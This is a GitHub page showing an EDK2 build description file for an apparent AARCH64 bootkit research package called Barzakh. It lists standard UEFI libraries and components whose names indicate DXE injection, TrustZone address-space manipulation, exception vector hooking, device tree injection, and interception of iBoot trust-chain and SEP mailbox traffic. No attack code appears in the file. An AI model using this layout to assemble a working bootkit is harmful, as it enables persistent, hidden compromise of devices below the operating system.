-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathBootkitPkgAarch64.dsc
More file actions
44 lines (40 loc) · 2.05 KB
/
Copy pathBootkitPkgAarch64.dsc
File metadata and controls
44 lines (40 loc) · 2.05 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
## @file
# Barzakh Bootkit Package - AARCH64 Platform
#
# Copyright (c) 2026, Barzakh Research Project
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
[Defines]
PLATFORM_NAME = BootkitPkg
PLATFORM_GUID = 12345678-AAAA-BBBB-CCCC-AA6C64010201
PLATFORM_VERSION = 2.0
DSC_SPECIFICATION = 0x00010005
OUTPUT_DIRECTORY = Build/BootkitPkgAarch64
SUPPORTED_ARCHITECTURES = AARCH64
BUILD_TARGETS = DEBUG|RELEASE
SKUID_IDENTIFIER = DEFAULT
[LibraryClasses]
UefiDriverEntryPoint|MdePkg/Library/UefiDriverEntryPoint/UefiDriverEntryPoint.inf
UefiBootServicesTableLib|MdePkg/Library/UefiBootServicesTableLib/UefiBootServicesTableLib.inf
UefiRuntimeServicesTableLib|MdePkg/Library/UefiRuntimeServicesTableLib/UefiRuntimeServicesTableLib.inf
UefiLib|MdePkg/Library/UefiLib/UefiLib.inf
BaseLib|MdePkg/Library/BaseLib/BaseLib.inf
BaseMemoryLib|MdePkg/Library/BaseMemoryLib/BaseMemoryLib.inf
MemoryAllocationLib|MdePkg/Library/UefiMemoryAllocationLib/UefiMemoryAllocationLib.inf
DebugLib|MdePkg/Library/BaseDebugLibNull/BaseDebugLibNull.inf
PrintLib|MdePkg/Library/BasePrintLib/BasePrintLib.inf
TimerLib|MdePkg/Library/BaseTimerLibNullTemplate/BaseTimerLibNullTemplate.inf
PcdLib|MdePkg/Library/BasePcdLibNull/BasePcdLibNull.inf
DevicePathLib|MdePkg/Library/UefiDevicePathLib/UefiDevicePathLib.inf
RegisterFilterLib|MdePkg/Library/RegisterFilterLibNull/RegisterFilterLibNull.inf
[Components]
BootkitPkg/Aarch64/Aarch64DxeInject.inf
BootkitPkg/Aarch64/El3SecureMonitor/El3SecureMonitor.inf
BootkitPkg/Aarch64/TzascManipulation/TzascManipulation.inf
BootkitPkg/Aarch64/ExceptionVectorHook/ExceptionVectorHook.inf
BootkitPkg/Aarch64/DeviceTreeInject/DeviceTreeInject.inf
BootkitPkg/Aarch64/IbootTrustChain/IbootTrustChain.inf
BootkitPkg/Aarch64/SepMailboxIntercept/SepMailboxIntercept.inf
[BuildOptions]
GCC:*_*_AARCH64_CC_FLAGS = -DBARZAKH_RESEARCH=1 -Wall -Wno-unused-parameter -Werror=implicit-function-declaration -fno-stack-protector